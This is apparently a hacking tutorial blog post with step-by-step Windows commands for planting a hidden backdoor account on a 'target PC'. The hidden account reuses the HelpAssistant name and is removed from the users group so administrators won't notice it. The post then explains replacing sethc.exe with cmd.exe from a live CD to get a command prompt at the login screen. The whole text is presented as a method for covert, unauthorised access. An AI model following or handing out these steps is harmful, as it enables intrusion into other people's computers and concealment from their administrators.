First of all, I’ll teach you how to create a Hidden Account in Windows using “Net User” command. Every Windows XP has a built in “HelpAssistant” account which has no use at all. If we delete this account and create another invisible account with the same name, we will reduce suspicion.
1) Got to run and type ‘cmd’ to open the Command Prompt.
2) Type “net user HelpAssistant /delete” to delete the default account.
3) Now, type “net user HelpAssistant /add” to add the backdoor.
4) Type “net user HelpAssistant <desired password>” to add a password to your backdoor.
5) Then type “net localgroup users HelpAssistant /delete” to delete HelpAssistant from ‘LocalUsers’ group and thereby make it hidden.
Congratulations, you have successfully created a backdoor on your target PC. One great advantage of this method is that if a system administrator checks all the Accounts on the PC using “net user” command, he won’t get suspicious seeing the ‘HelpAssistant’ user.
Ok, now that you have created a Hidden account, to log in to the account, just press “Ctrl + Alt + Delete + Delete” when you reach the Welcome Screen and simply log in to the backdoor.
So, if you get a command prompt on windows, you can create a backdoor. But, what if you could get a command prompt on the Windows Welcome Screen (a.k.a Login Screen) itself?
It you press shift key 5 times, the Sticky Key dialog box will pop up. This is because ‘sethc.exe’ gets executed. The good news is that it gets executed even at the welcome screen. We can exploit this to get access to Command Prompt at the welcome screen.
1) You’ll have to boot from a live CD or something and access the windows filesystem, particularly ‘system32’ folder.
2) Locate the ‘sethc.exe’ in ‘C:Windowssystem32’ and rename it to ‘sethc.bak’ for backup purposes.
3) Copy ‘cmd.exe’ to another location, rename it to ‘sethc.exe’and copy it back to the ‘system32’ folder.
After this you can hit the Shift Key 5 times on the Welcome Screen and will get the Command Prompt right there. Net User command can be used to modify User Accounts thereafter.
Conclusion: If you could somehow replace one file in system32, you can compromise the whole system.
To run ‘net user commands on Vista and 7, go to start and type ‘CMD’. Richt Click ‘CMD’ and click on ‘Run a Administrator’.